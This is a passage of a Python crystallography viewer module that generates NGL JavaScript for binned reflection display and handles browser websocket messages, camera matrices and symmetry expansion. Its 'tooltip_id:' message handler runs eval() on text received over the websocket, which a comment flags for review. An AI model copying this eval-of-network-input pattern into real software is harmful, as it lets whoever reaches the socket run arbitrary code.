mshape.addArrow( %s, %s , [ 0, 0, 1 ], 0.1);
//green-y
mshape.addArrow( %s, %s , [ 0, 1, 0 ], 0.1);
//red-z
mshape.addArrow( %s, %s , [ 1, 0, 0 ], 0.1);
mshape.addText( %s, [ 0, 0, 1 ], fontsize, 'h');
mshape.addText( %s, [ 0, 1, 0 ], fontsize, 'k');
mshape.addText( %s, [ 1, 0, 0 ], fontsize, 'l');
};
""" %(fontsize, str(Hstararrowstart), str(Hstararrowend),
            str(Kstararrowstart),
            str(Kstararrowend), str(Lstararrowstart), str(Lstararrowend), Hstararrowtxt,
            Kstararrowtxt, Lstararrowtxt)
    if not blankscene:
        # Make colour gradient array used for drawing a bar of colours next to associated values on the rendered html
        mincolourscalar = self.HKLMinData_from_dict(self.colour_scene_id)
        maxcolourscalar = self.HKLMaxData_from_dict(self.colour_scene_id)
        if self.viewerparams.sigma_color:
            mincolourscalar = self.HKLMinSigmas_from_dict(self.colour_scene_id)
            maxcolourscalar = self.HKLMaxSigmas_from_dict(self.colour_scene_id)
        span = maxcolourscalar - mincolourscalar
        ln = 60
        incr = span/ln
        colourgradarrays = []
        val = mincolourscalar
        colourscalararray = flex.double()
        colourscalararray.append( val )
        for j,sc in enumerate(range(ln)):
            val += incr
            colourscalararray.append( val )
        if self.HKLscene_from_dict(self.colour_scene_id).miller_array.is_complex_array():
            # When displaying phases from map coefficients together with fom values
            # compute colour map chart as a function of fom and phase values (x,y axis)
            incr = 360.0/ln
            val = 0.0
            colourscalararray = flex.double()
            colourscalararray.append( val )
            for j in enumerate(range(ln)):
                val += incr
                colourscalararray.append( val )
            fomarrays = []
            if self.HKLscene_from_dict(self.colour_scene_id).isUsingFOMs():
                fomln = 50
                fom = 1.0
                fomdecr = 1.0/(fomln-1.0)
                # make fomln fom arrays of size len(colourscalararray) when calling colour_by_phi_FOM
                for j in range(fomln):
                    fomarrays.append( flex.double(len(colourscalararray), fom) )
                    fom -= fomdecr
                for j in range(fomln):
                    colourgradarrays.append( graphics_utils.colour_by_phi_FOM( colourscalararray*(math.pi/180.0), fomarrays[j] ) * 255.0)
            else:
                fomln =1
                fomarrays = [1.0]
                colourgradarrays.append( graphics_utils.colour_by_phi_FOM( colourscalararray*(math.pi/180.0) ) * 255.0)
        else:
            fomln = 1
            fomarrays = [1.0]
            colourgradarrays.append(graphics_utils.color_by_property(
                properties= flex.double(colourscalararray),
                selection=flex.bool( len(colourscalararray), True),
                color_all=False,
                gradient_type= self.viewerparams.color_scheme) * 255.0)
        colors = self.HKLscene_from_dict(self.colour_scene_id).colors
        radii = self.HKLscene_from_dict(self.radii_scene_id).radii
        self.meanradius = flex.mean(radii)
    if blankscene:
        points = flex.vec3_double( [ ] )
        colors = flex.vec3_double( [ ] )
        radii = flex.double( [ ] )
        self.bin_labels_type_idx = ("Resolution", "", -1, -1)
    else:
        points = self.scene.points
    nrefls = points.size()
    hkls = self.scene.indices
    dres = self.scene.dres
    # colstr names the quantity the reflections are binned by
    if self.bin_labels_type_idx[0] =="Resolution":
        colstr = "dres"
    elif self.bin_labels_type_idx[0] =="Singletons":
        colstr = "Singleton"
    else:
        if not blankscene:
            colstr = self.HKLscene_from_dict(self.bin_labels_type_idx[3]).work_array.info().label_string()
    data = self.scene.data
    if not blankscene:
        colourlabel = self.HKLscene_from_dict(self.colour_scene_id).colourlabel
        fomlabel = self.HKLscene_from_dict(self.colour_scene_id).fomlabel
    #import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
    assert (colors.size() == radii.size() == nrefls)
    colours = []
    positions = []
    radii2 = []
    spbufttips = []
    self.binvalsboundaries = []
    if not blankscene:
        if self.bin_labels_type_idx[0] =="Resolution":
            self.binvalsboundaries = self.binvals
            self.bindata = 1.0/self.scene.dres
        elif self.bin_labels_type_idx[0] =="Singletons":
            self.binvalsboundaries = self.binvals
            self.bindata = self.scene.singletonsiness
        else:
            dummy, self.binvalsboundaries = self.get_matched_binarray()
            self.binvalsboundaries.extend( self.binvals )
            self.binvalsboundaries.sort()
            if self.binvalsboundaries[0] < 0.0:
                self.binvalsboundaries.append(0.0)
                self.binvalsboundaries.sort()
            self.bindata = self.MatchBinArrayToSceneArray()
    self.nbinvalsboundaries = len(self.binvalsboundaries)
    # avoid resetting opacities of bins unless we change the number of bins
    if self.oldnbinvalsboundaries != self.nbinvalsboundaries:
        self.ngl_settings.bin_opacities = str([ (1.0, e) for e in range(self.nbinvalsboundaries + 1) ])
    self.oldnbinvalsboundaries = self.nbinvalsboundaries
    # Un-binnable data are scene data values where there are no matching reflections in the bin data
    # Put these in a separate bin and be diligent with the book keeping!
    for ibin in range(self.nbinvalsboundaries+1): # adding the extra bin for un-binnable data
        colours.append([]) # colours and positions are 3 x size of data()
        positions.append([])
        radii2.append([])
        spbufttips.append([])
    def data2bin(d, binvalsboundaries, nbinvalsboundaries):
        # map data value d to the index of its half-open bin interval
        for ibin, binval in enumerate(binvalsboundaries):
            if math.isnan(d): # NaN values are un-binnable. Tag them for an additional last bin
                return nbinvalsboundaries
            if (ibin+1) == nbinvalsboundaries:
                return ibin
            if d > binval and d <= binvalsboundaries[ibin+1]:
                return ibin
        raise Sorry("data2bin: Should never get here")
    def getprecision(v1,v2):
        # number of decimal places needed to distinguish v1 from v2
        diff = abs(v1-v2); precision = 1; e = 1
        while diff*e < 1.0:
            e *= 10
            precision += 1
        return precision
    if nrefls > 0 and self.bindata.size() != points.size():
        raise Sorry("Not the same number of reflections in bin-data and displayed data")
    start_time = time.time()
    for i, hklstars in enumerate(points):
        # bin currently displayed data according to the values of another miller array
        ibin = data2bin( self.bindata[i], self.binvalsboundaries, self.nbinvalsboundaries )
        positions[ibin].extend( graphics_utils.flt_roundoffvec3(hklstars, 2) )
        colours[ibin].extend( graphics_utils.flt_roundoffvec3(colors[i], 2) )
        radii2[ibin].append( graphics_utils.flt_roundoff(radii[i], 2) )
        spbufttips[ibin].append( i )
    elapsed_time = time.time() - start_time
    self.mprint("elapsed time: %s" %elapsed_time, verbose=2)
    # emit one NGL shape buffer per non-empty bin
    spherebufferstr = self.colstraliases
    negativeradiistr = ""
    cntbin = 0
    self.binstrs = []
    self.bin_infotpls = []
    if self.nuniqueval < self.params.nbins:
        self.mprint("%d bins was requested but %s data has only %d unique value(s)!" %(self.params.nbins, colstr, self.nuniqueval), 0)
    for ibin in range(self.nbinvalsboundaries+1):
        mstr =""
        nreflsinbin = len(radii2[ibin])
        if nreflsinbin == 0:
            continue
        bin2 = float("nan"); bin1= float("nan") # indicates un-binned data
        if ibin == self.nbinvalsboundaries:
            mstr= "bin[%d] has %d reflections with no %s values (assigned to %2.3f)" %(cntbin, nreflsinbin, \
                    colstr, bin1)
        precision = 3
        if ibin < (self.nbinvalsboundaries-1):
            bin1 = self.binvalsboundaries[ibin]
            bin2 = self.binvalsboundaries[ibin+1]
            bin3 = bin2
            if ibin < (self.nbinvalsboundaries-2):
                bin3= self.binvalsboundaries[ibin+2]
            if colstr=="dres":
                # resolution bins are stored as 1/d; present them as d-spacings
                bin1= 1.0/self.binvalsboundaries[ibin]
                bin2= 1.0/self.binvalsboundaries[ibin+1]
                if ibin < (self.nbinvalsboundaries-2):
                    bin3= 1.0/self.binvalsboundaries[ibin+2]
            #calculate precision by comparing a bin value with bin value below and above it
            prec1 = getprecision(bin1, bin2)
            prec2 = prec1
            if bin2 != bin3:
                prec2 = getprecision(bin3, bin2)
            precision = max(prec1, prec2)
            # format bin values string with necessary decimal places (precision)
            binformatstr = "]%2." + str(precision) + "f; %2." + str(precision) + "f]"
            mstr= "bin[%d] has %d reflections with %s in " %(cntbin, nreflsinbin, colstr)
            mstr += binformatstr %(bin1, bin2)
        self.bin_infotpls.append( roundoff((nreflsinbin, bin1, bin2 ), precision) )
        self.binstrs.append(mstr)
        self.mprint(mstr, verbose=0)
        spherebufferstr += "\n// %s\n" %mstr
        #spherebufferstr += " ttips.push( [ ] );"
        # tooltip id list is prefixed with -1 as a sentinel
        ttlst = [-1]
        ttlst.extend(spbufttips[ibin])
        ttipsobj = "{ ids: " + str( ttlst ) + """,
getPosition: function() { return { x:0, y:0 }; } // dummy function to avoid crash
} """
        # + ",\n getPosition: function() { return stage.mouseObserver.canvasPosition; } }"
        spherebufferstr += " ttips.push( %s );" %str( ttipsobj )
        spherebufferstr += """
positions.push( new Float32Array( %s ) );
colours.push( new Float32Array( %s ) );
radii.push( new Float32Array( %s ) );
shapebufs.push( new NGL.%s({
position: positions[%d],
color: colours[%d], """ %(str(positions[ibin]), str(colours[ibin]), \
                str(radii2[ibin]), self.primitivetype, cntbin, \
                cntbin)
        if self.primitivetype == "SphereBuffer":
            spherebufferstr += "\n radius: radii[%d]," %cntbin
        spherebufferstr += "\n picking: ttips[%d]," %cntbin
        if self.primitivetype == "PointBuffer":
            spherebufferstr += "\n }, {pointSize: %1.2f})\n" %self.viewerparams.scale
        else:
            if self.high_quality:
                spherebufferstr += """
})
);
"""
            else:
                spherebufferstr += """
}, { disableImpostor: true
, sphereDetail: 0 }) // rather than default value of 2 icosahedral subdivisions
);
"""
        spherebufferstr += "shape.addBuffer(shapebufs[%d]);\n alphas.push(1.0);\n" %cntbin
        cntbin += 1
    if self.ngl_settings.bin_opacities == "":
        self.ngl_settings.bin_opacities = str([ (1.0, e) for e in range(cntbin) ])
    self.SendInfoToGUI( { "bin_opacities": self.ngl_settings.bin_opacities,
                          "bin_infotpls": self.bin_infotpls,
                          "bin_data_label": self.bin_labels_type_idx[0],
                          "tooltip_opacity": self.ngl_settings.tooltip_alpha
                        } )
    if not blankscene:
        colourgradstrs = "colourgradvalarray = new Array(%s);\n" %fomln
        # if displaying phases from map coefficients together with fom values then
        for g,colourgradarray in enumerate(colourgradarrays):
            self.colourgradientvalues = []
            for j,e in enumerate(colourgradarray):
                self.colourgradientvalues.append( [colourscalararray[j], e] )
            self.colourgradientvalues = roundoff( self.colourgradientvalues )
            fom = fomarrays[g]
            colourgradstr = []
            for j,val in enumerate(self.colourgradientvalues):
                vstr = ""
                alpha = 1.0
                rgb = (int(val[1][0]), int(val[1][1]), int(val[1][2]) )
                gradval = "rgba(%s, %s, %s, %s)" %(rgb[0], rgb[1], rgb[2], alpha)
                # label only every 10th value (and the last) on the chart
                if j%10 == 0 or j==len(self.colourgradientvalues)-1 :
                    vstr = str( roundoff(val[0], 2, as_string=True) )
                colourgradstr.append([vstr , gradval])
            colourgradstrs += " colourgradvalarray[%s] = %s;\n" %(g, str(colourgradstr) )
        colourscriptstr = """
//colourgradvalarrays
%s
ColourChart("%s", "%s");
""" % (colourgradstrs, colourlabel, fomlabel)
    qualitystr = """ , { disableImpostor: true
, sphereDetail: 0 } // rather than default value of 2 icosahedral subdivisions
"""
    if self.high_quality:
        qualitystr = ""
    self.NGLscriptstr = ""
    if not blankscene:
        self.NGLscriptstr = HKLJavaScripts.NGLscriptstr % ( self.ngl_settings.tooltip_alpha,
            '\"' + self.camera_type + '\"', axisfuncstr, spherebufferstr,
            negativeradiistr, colourscriptstr)
    WebsockMsgHandlestr = HKLJavaScripts.WebsockMsgHandlestr %(self.websockport, cntbin,
        str(self.verbose>=2).lower(), self.__module__, self.__module__, qualitystr )
    self.NGLscriptstr = WebsockMsgHandlestr + self.NGLscriptstr
    if self.jscriptfname:
        with open( self.jscriptfname, "w") as f:
            f.write( self.NGLscriptstr )
    self.ReloadNGL()
    if not blankscene:
        # wait for the browser to report its view matrix before querying it
        if self.WaitforHandshake():
            nwait = 0
            while self.viewmtrx is None and nwait < self.handshakewait:
                #time.sleep(self.sleeptime)
                self.WBmessenger.Sleep(self.sleeptime)
                nwait += self.sleeptime
        self.GetClipPlaneDistances()
        self.GetBoundingBox()
        self.OrigClipFar = self.clipFar
        self.OrigClipNear = self.clipNear
        self.SetMouseSpeed( self.ngl_settings.mouse_sensitivity )
    self.sceneisdirty = False
    self.lastscene_id = self.viewerparams.scene_id
def ProcessMessage(self, message):
    """Dispatch one message received from the browser websocket.

    Messages are either binary blobs (the raw image data following an
    "Imageblob" announcement) or strings whose keyword prefix identifies
    the request. Unrecognised messages are ignored. Any exception is
    caught and printed so that a malformed message cannot kill the
    websocket listener. The message is remembered in self.lastmsg so a
    following binary blob can be associated with its announcement.
    """
    try:
        if sys.version_info[0] > 2:
            ustr = str
        else:
            ustr = unicode
        # bytes following an "Imageblob" string message: save the image
        if isinstance(message, bytes) and isinstance(self.lastmsg, ustr) and "Imageblob" in self.lastmsg:
            self.mprint( "Saving image to file", verbose=1)
            with open( self.imagename, "wb") as imgfile:
                imgfile.write( message)
        if isinstance(message, ustr) and message != "":
            if "Orientation" in message:
                self.ProcessOrientationMessage(message)
            elif 'Received message:' in message:
                self.mprint( message, verbose=2)
            elif "websocket" in message:
                self.mprint( message, verbose=1)
            elif "Refreshing" in message or "disconnecting" in message:
                self.mprint( message, verbose=1)
                self.WBmessenger.Sleep(self.sleeptime)
            elif "AutoViewSet" in message:
                self.set_volatile_params()
            elif "JavaScriptCleanUpDone:" in message:
                self.mprint( message, verbose=1)
                self.WBmessenger.Sleep(0.5) # time for browser to clean up
                if not self.isnewfile:
                    self.WBmessenger.StopWebsocket()
            elif "JavaScriptError:" in message:
                self.mprint( message, verbose=0)
            elif "Expand" in message:
                self.mprint( message, verbose=2)
            elif "Connection lost" in message:
                self.mprint( message, verbose=1)
            elif "Imageblob" in message:
                self.mprint( "Image to be received", verbose=1)
            elif "ImageWritten" in message:
                self.mprint( "Image saved to file", verbose=0)
            elif "ReturnClipPlaneDistances:" in message:
                # payload: "near,far,cameraPosZ" on the line after the keyword
                datastr = message[ message.find("\n") + 1: ]
                lst = datastr.split(",")
                flst = [float(e) for e in lst]
                self.clipNear = flst[0]
                self.clipFar = flst[1]
                self.cameraPosZ = flst[2]
            elif "ReturnBoundingBox:" in message:
                # payload: "x,y,z" extents on the line after the keyword
                datastr = message[ message.find("\n") + 1: ]
                lst = datastr.split(",")
                flst = [float(e) for e in lst]
                self.boundingX = flst[0]
                self.boundingY = flst[1]
                self.boundingZ = flst[2]
            elif "ReturnMouseSpeed" in message:
                datastr = message[ message.find("\n") + 1: ]
                lst = datastr.split(",")
                flst = [float(e) for e in lst]
                # float() never returns None, so only NaN needs guarding.
                # math.isnan (not cmath.isnan) since the value is a real float.
                if not math.isnan(flst[0]):
                    self.ngl_settings.mouse_sensitivity = flst[0]
            elif "tooltip_id:" in message:
                # SECURITY NOTE: eval() of text received over the websocket;
                # kept as-is for the local trusted browser but flagged for review.
                # Parse the "[hklid, sym_id, is_friedel_mate]" payload once
                # instead of eval'ing it three times as before.
                hklid, sym_id, is_friedel_mate = eval(message.split("tooltip_id:")[1])[:3]
                hkls = self.scene.indices
                if not is_friedel_mate:
                    ttip = self.GetTooltipOnTheFly(hklid, sym_id)
                else:
                    # friedel mates are indexed past the originals; map back
                    hklid = hklid % len(hkls)
                    ttip = self.GetTooltipOnTheFly(hklid, sym_id, anomalous=True)
                self.AddToBrowserMsgQueue("ShowThisTooltip", ttip)
            else:
                if "Ready " in message:
                    self.mprint( message, verbose=5)
    except Exception as e:
        self.mprint( to_str(e) + "\n" + traceback.format_exc(limit=10), verbose=0)
    self.lastmsg = message
def GetCameraPosRotTrans(self, viewmtrx):
    """Decompose the view matrix string from the browser into camera
    distance, a pure rotation matrix and a translation vector.

    viewmtrx: comma separated floats — presumably 16 column-major 4x4
    matrix elements followed by a distance value, matching the 17
    placeholders in the diagnostic printout below (TODO: confirm against
    the browser side).

    Returns (cameraPosZ, currentRotmx, cameratranslation). If the rotation
    part has a non-positive determinant, the view is reset and the
    previous (possibly stale) values are returned as a fall back.
    """
    lst = viewmtrx.split(",")
    flst = [float(e) for e in lst]
    # upper-left 3x3 of the column-major view matrix: rotation times scale
    ScaleRotMx = matrix.sqr( (flst[0], flst[4], flst[8],
                              flst[1], flst[5], flst[9],
                              flst[2], flst[6], flst[10]
                              )
    )
    cameratranslation = (flst[12], flst[13], flst[14])
    self.mprint("translation: %s" %str(roundoff(cameratranslation)), verbose=3)
    alllst = roundoff(flst)
    self.mprint("""OrientationMatrix matrix:
%s, %s, %s, %s
%s, %s, %s, %s
%s, %s, %s, %s
%s, %s, %s, %s
Distance: %s
""" %tuple(alllst), verbose=4)
    rotdet = ScaleRotMx.determinant()
    if rotdet <= 0.0:
        self.mprint("Negative orientation matrix determinant!!", verbose=1)
        self.SetAutoView() # return old values as a fall back even if they're out of date
        return self.cameraPosZ, self.currentRotmx, self.cameratranslation
    else:
        # det(R*s) = s^3 for a pure rotation R, so the cube root recovers
        # the uniform scale, i.e. the camera distance
        cameradist = math.pow(rotdet, 1.0/3.0)
    self.mprint("Scale distance: %s" %roundoff(cameradist), verbose=3)
    currentRotmx = matrix.identity(3)
    if cameradist > 0.0:
        # divide out the scale to leave a pure rotation
        currentRotmx = ScaleRotMx/cameradist
        cameraPosZ = cameradist
    return cameraPosZ, currentRotmx, cameratranslation
def ProcessOrientationMessage(self, message):
    """Update the cached camera orientation from an "Orientation..."
    message sent by the browser.

    The view matrix is the text after the first newline of the message.
    Messages containing NaN or undefined values are ignored. Also derives
    the cartesian and reciprocal directions currently pointing towards
    the viewer (rot_zvec, rot_recip_zvec) for use by the clip-plane code.
    """
    if message.find("NaN")>=0 or message.find("undefined")>=0:
        return
    if "OrientationBeforeReload:" in message:
        #sleep(0.2)
        # remember the last orientation so it can be restored after a reload
        if not self.isnewfile:
            self.viewmtrx = message[ message.find("\n") + 1: ]
            self.lastviewmtrx = self.viewmtrx
        self.isnewfile = False
    self.viewmtrx = message[ message.find("\n") + 1: ]
    self.cameraPosZ, self.currentRotmx, self.cameratranslation = self.GetCameraPosRotTrans( self.viewmtrx)
    rotlst = roundoff(self.currentRotmx.elems)
    self.mprint("""Rotation matrix:
%s, %s, %s
%s, %s, %s
%s, %s, %s
""" %rotlst, verbose=3)
    if "MouseMovedOrientation:" in message:
        self.params.mouse_moved = True
    if self.currentRotmx.is_r3_rotation_matrix():
        # Round off matrix elements to avoid machine imprecision errors that might cast
        # any matrix element into a number strictly larger than 1 which would
        # crash r3_rotation_matrix_as_x_y_z_angles()
        self.currentRotmx = matrix.sqr(roundoff(self.currentRotmx.elems, 9) )
        angles = self.currentRotmx.r3_rotation_matrix_as_x_y_z_angles(deg=True)
        self.mprint("angles: %s" %str(roundoff(angles)), verbose=3)
        z_vec = flex.vec3_double( [(0,0,1)])
        self.rot_zvec = z_vec * self.currentRotmx
        self.mprint("Rotated cartesian Z direction : %s" %str(roundoff(self.rot_zvec[0])), verbose=3)
        rfracmx = matrix.sqr( self.miller_array.unit_cell().reciprocal().fractionalization_matrix() )
        self.rot_recip_zvec = self.rot_zvec * rfracmx
        self.rot_recip_zvec = (1.0/self.rot_recip_zvec.norm()) * self.rot_recip_zvec
        self.mprint("Rotated reciprocal L direction : %s" %str(roundoff(self.rot_recip_zvec[0])), verbose=3)
def WaitforHandshake(self, sec=5):
    """Block until the browser reports it is open, or time out.

    Polls in increments of self.sleeptime for at most `sec` seconds.
    Returns True once the browser connection is up, False on timeout.
    """
    waited = 0
    messenger = self.WBmessenger
    while not messenger.browserisopen:
        messenger.Sleep(self.sleeptime)
        waited += self.sleeptime
        if waited > sec:
            return False
    return True
def OpenBrowser(self):
    """Write the HTML wrapper page and open it in a web browser.

    Only acts when a scene is selected and no websocket client/browser is
    connected, or when a new file has been loaded. Note the operator
    precedence of the condition: (scene set AND no client AND browser not
    open) OR isnewfile. Returns True if a browser page was (re)opened,
    False otherwise (including when the chosen browser failed to start).
    """
    if self.viewerparams.scene_id is not None and not self.WBmessenger.websockclient \
       and not self.WBmessenger.browserisopen or self.isnewfile:
        # page loads ngl.js from the cctbx installation plus our generated script
        NGLlibpath = libtbx.env.under_root(os.path.join("modules","cctbx_project","crys3d","hklview","ngl.js") )
        htmlstr = self.hklhtml %(NGLlibpath, os.path.abspath( self.jscriptfname))
        htmlstr += self.htmldiv
        with open(self.hklfname, "w") as f:
            f.write( htmlstr )
        self.url = "file:///" + os.path.abspath( self.hklfname )
        self.url = self.url.replace("\\", "/")
        self.mprint( "Writing %s and connecting to its websocket client" %self.hklfname, verbose=1)
        if self.UseOSBrowser=="default":
            if not webbrowser.open(self.url, new=0):
                self.mprint("Could not open the default web browser")
                return False
        if self.UseOSBrowser != "default" and self.UseOSBrowser != "":
            # an explicit browser executable was requested
            browserpath = self.UseOSBrowser + " %s"
            if not webbrowser.get(browserpath).open(self.url, new=0):
                self.mprint("Could not open web browser, %s" %self.UseOSBrowser)
                return False
        self.SendInfoToGUI({ "html_url": self.url } )
        self.WBmessenger.browserisopen = True
        self.isnewfile = False
        return True
    return False
def set_camera_type(self):
    """Adopt the camera type currently chosen in the NGL settings."""
    self.camera_type = self.ngl_settings.camera_type
def set_show_tooltips(self):
    """Tell the browser whether reflection tooltips should be displayed."""
    self.AddToBrowserMsgQueue("DisplayTooltips", "%s" %self.ngl_settings.show_tooltips)
def set_tooltip_opacity(self):
    """Forward the configured tooltip opacity (alpha) to the browser."""
    self.AddToBrowserMsgQueue("TooltipOpacity", "%f" %self.ngl_settings.tooltip_alpha)
def SetOpacities(self, bin_opacities_str):
    """Apply per-bin opacities and report the new values to the GUI.

    Parameters:
      bin_opacities_str: string repr of a list of (alpha, bin_index)
        tuples, e.g. "[(1.0, 0), (0.5, 1)]", as produced by str([...])
        elsewhere in this class.

    Does nothing when no miller array is loaded, the string is empty, or
    data was injected directly (isinjected).
    """
    import ast  # local import: only needed for parsing the opacity list
    retstr = ""
    if self.miller_array and bin_opacities_str and not self.isinjected:
        self.ngl_settings.bin_opacities = bin_opacities_str
        # ast.literal_eval instead of eval: the string round-trips through
        # the GUI and must never be able to execute arbitrary code.
        bin_opacitieslst = ast.literal_eval(self.ngl_settings.bin_opacities)
        for alpha, bin_idx in bin_opacitieslst:
            retstr += self.set_opacity(bin_idx, alpha)
        self.SendInfoToGUI( { "bin_opacities": self.ngl_settings.bin_opacities } )
    self.mprint( retstr, verbose=1)
def set_opacity(self, bin, alpha):
    """Set the opacity of one reflection bin in the browser.

    Returns a human readable status string (also used by SetOpacities).
    """
    if bin > self.nbinvalsboundaries-1:
        return "There are only %d bins present\n" %self.nbinvalsboundaries
    self.AddToBrowserMsgQueue("alpha", "%d, %f" %(bin, alpha))
    return "Opacity %s set on bin[%s]\n" %(alpha, bin)
def RedrawNGL(self):
    """Ask the browser to redraw the scene from its existing buffers."""
    self.AddToBrowserMsgQueue("Redraw")
def ReloadNGL(self):
    """Reload the generated JavaScript in the browser.

    Expensive, as the generated javascript may be several Mbytes large.
    If no browser page existed yet, OpenBrowser() loads it instead and
    no explicit reload message is needed.
    """
    self.mprint("Rendering JavaScript...", verbose=1)
    if not self.OpenBrowser():
        self.AddToBrowserMsgQueue("Reload")
def JavaScriptCleanUp(self):
    """Ask the browser page to tear down its NGL objects.

    (Fixed a stray trailing comma in the parameter list; the call
    signature is unchanged.)
    """
    self.AddToBrowserMsgQueue("JavaScriptCleanUp")
def ExpandInBrowser(self, P1=True, friedel_mate=True):
    """Ask the browser to draw symmetry and/or Friedel expanded reflections.

    P1: expand to spacegroup P1 by sending one cartesian rotation matrix
      per unique rotational symmetry operator.
    friedel_mate: also expand Friedel mates, unless the data are already
      anomalous.
    Does nothing while the scene is out of date (sceneisdirty).
    """
    if self.sceneisdirty:
        self.mprint( "Not expanding in browser", verbose=1)
        return
    # cartesian rotation = Ort * R * Ort^-1 for each fractional operator R
    uc = self.miller_array.unit_cell()
    OrtMx = matrix.sqr( uc.orthogonalization_matrix())
    InvMx = OrtMx.inverse()
    msgtype = "Expand"
    msg = ""
    unique_rot_ops = []
    if P1:
        msgtype += "P1"
        unique_rot_ops = self.symops[ 0 : self.sg.order_p() ] # avoid duplicate rotation matrices
        retmsg = "Expanding to P1 in browser"
        if not self.miller_array.is_unique_set_under_symmetry():
            retmsg += "\nNot all reflections are in the same asymmetric unit in reciprocal space.\n"
            retmsg += "Some reflections might be displayed on top of one another.\n"
        self.mprint( retmsg, verbose=1)
    else:
        unique_rot_ops = [ self.symops[0] ] # No P1 expansion. So only submit the identity matrix
    if friedel_mate and not self.miller_array.anomalous_flag():
        msgtype += "Friedel"
        self.mprint( "Expanding Friedel mates in browser", verbose=1)
    for i, symop in enumerate(unique_rot_ops):
        RotMx = matrix.sqr( symop.r().as_double())
        ortrot = (OrtMx * RotMx * InvMx).as_mat3()
        if RotMx.is_r3_identity_matrix():
            # avoid machine precision rounding errors converting 1.0 to 0.99999999..
            ortrot = (1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 1.0)
        str_rot = str(ortrot)
        str_rot = str_rot.replace("(", "")
        str_rot = str_rot.replace(")", "")
        msg += str_rot + "\n" # add rotation matrix to end of message string
    self.AddToBrowserMsgQueue(msgtype, msg)
    self.GetBoundingBox() # bounding box changes when the extent of the displayed lattice changes
def AddVector(self, s1, s2, s3, t1, t2, t3, isreciprocal=True, label="",
             r=0, g=0, b=0, name="", radius = 0.15):
    """
    Place vector from [s1, s2, s3] to [t1, t2, t3] with colour r,g,b and label
    If name=="" creation is deferred until AddVector is eventually called with name != ""
    These vectors are then joined in the same NGL representation

    Coordinates are interpreted in reciprocal space (isreciprocal=True) or
    as real space fractional coordinates, and converted to cartesian
    before being sent to the browser. Returns (angle_x_xyvec,
    angle_z_svec), the angles in degrees used elsewhere to orient the
    view along or perpendicular to this vector.
    """
    uc = self.miller_array.unit_cell()
    vec1 = (s1*self.scene.renderscale, s2*self.scene.renderscale, s3*self.scene.renderscale)
    vec2 = (t1*self.scene.renderscale, t2*self.scene.renderscale, t3*self.scene.renderscale)
    #svec = list(vec)
    if isreciprocal:
        # uc.reciprocal_space_vector() only takes integer miller indices so compute the cartesian coordinates
        # for floating valued miller indices with the transpose of the fractionalization matrix
        vec1 = list( vec1 * matrix.sqr(uc.fractionalization_matrix()).transpose() )
        vec2 = list( vec2 * matrix.sqr(uc.fractionalization_matrix()).transpose() )
        svec1 = [ vec1[0], vec1[1], vec1[2] ]
        svec2 = [ vec2[0], vec2[1], vec2[2] ]
    else:
        vec1 = list( vec1 * matrix.sqr(uc.orthogonalization_matrix()) )
        vec2 = list( vec2 * matrix.sqr(uc.orthogonalization_matrix()) )
        vscale = 1.0/self.scene.renderscale
        # TODO: find suitable scale factor for displaying real space vector together with reciprocal vectors
        svec1 = [ vscale*vec1[0], vscale*vec1[1], vscale*vec1[2] ]
        svec2 = [ vscale*vec2[0], vscale*vec2[1], vscale*vec2[2] ]
    self.mprint("cartesian vector is: %s to %s" %(str(roundoff(svec1)), str(roundoff(svec2))), verbose=2)
    svec = [svec2[0]-svec1[0], svec2[1]-svec1[1], svec2[2]-svec1[2] ]
    xyvec = svec[:] # deep copying
    xyvec[2] = 0.0 # projection vector of svec in the xy plane
    xyvecnorm = math.sqrt( xyvec[0]*xyvec[0] + xyvec[1]*xyvec[1] )
    if xyvecnorm > 0.0:
        angle_x_xyvec = math.acos( xyvec[0]/xyvecnorm )*180.0/math.pi
        angle_y_xyvec = math.acos( xyvec[1]/xyvecnorm )*180.0/math.pi
    else:
        # svec is parallel to z; the in-plane angles are degenerate
        angle_x_xyvec = 90.0
        angle_y_xyvec = 90.0
    yzvec = svec[:]
    yzvec[0] = 0.0 # projection vector of svec in the yz plane
    yzvecnorm = math.sqrt( yzvec[1]*yzvec[1] + yzvec[2]*yzvec[2] )
    if yzvecnorm > 0.0:
        angle_y_yzvec = math.acos( yzvec[1]/yzvecnorm )*180.0/math.pi
        angle_z_yzvec = math.acos( yzvec[2]/yzvecnorm )*180.0/math.pi
    else:
        angle_y_yzvec = 90.0
        angle_z_yzvec = 90.0
    svecnorm = math.sqrt( svec[0]*svec[0] + svec[1]*svec[1] + svec[2]*svec[2] )
    angle_x_svec = math.acos( svec[0]/svecnorm )*180.0/math.pi
    angle_y_svec = math.acos( svec[1]/svecnorm )*180.0/math.pi
    angle_z_svec = math.acos( svec[2]/svecnorm )*180.0/math.pi
    if angle_y_svec > 90.0:
        # flip sign so the view orientation code rotates the shorter way round
        angle_x_xyvec = -angle_x_xyvec
    self.mprint("angles in xy plane to x,y axis are: %s, %s" %(angle_x_xyvec, angle_y_xyvec), verbose=2)
    self.mprint("angles in yz plane to y,z axis are: %s, %s" %(angle_y_yzvec, angle_z_yzvec), verbose=2)
    self.mprint("angles to x,y,z axis are: %s, %s, %s" %(angle_x_svec, angle_y_svec, angle_z_svec ), verbose=2)
    self.mprint("deferred rendering vector from (%s, %s, %s) to (%s, %s, %s)" %(s1, s2, s3, t1, t2, t3), verbose=2)
    self.AddToBrowserMsgQueue("AddVector", "%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s" \
         %tuple(svec1 + svec2 + [r, g, b, label, name, radius]) )
    return angle_x_xyvec, angle_z_svec
def PointVectorPerpendicularToClipPlane(self):
    """Orient the view so the current vector is perpendicular to the clip
    plane, returning the rotation matrix used.

    If the matrix is degenerate (determinant noticeably below 1) it is
    returned without being applied to the view.
    """
    euler_angles = (self.angle_x_xyvec, self.angle_z_svec, 0.0)
    rotation = self.Euler2RotMatrix(euler_angles)
    if rotation.determinant() >= 0.99999:
        self.currentRotmx = rotation
        self.RotateMxStage(rotation)
    else:
        self.mprint("Rotation matrix determinant is less than 1")
    return rotation
def PointVectorParallelToClipPlane(self):
    """Orient the view so the current vector lies parallel to the clip
    plane, returning the rotation matrix used.

    If the matrix is degenerate (determinant noticeably below 1) it is
    returned without being applied to the view.
    """
    euler_angles = (self.angle_x_xyvec, self.angle_z_svec+90.0, 90.0)
    rotation = self.Euler2RotMatrix(euler_angles)
    if rotation.determinant() >= 0.99999:
        self.currentRotmx = rotation
        self.RotateMxStage(rotation)
    else:
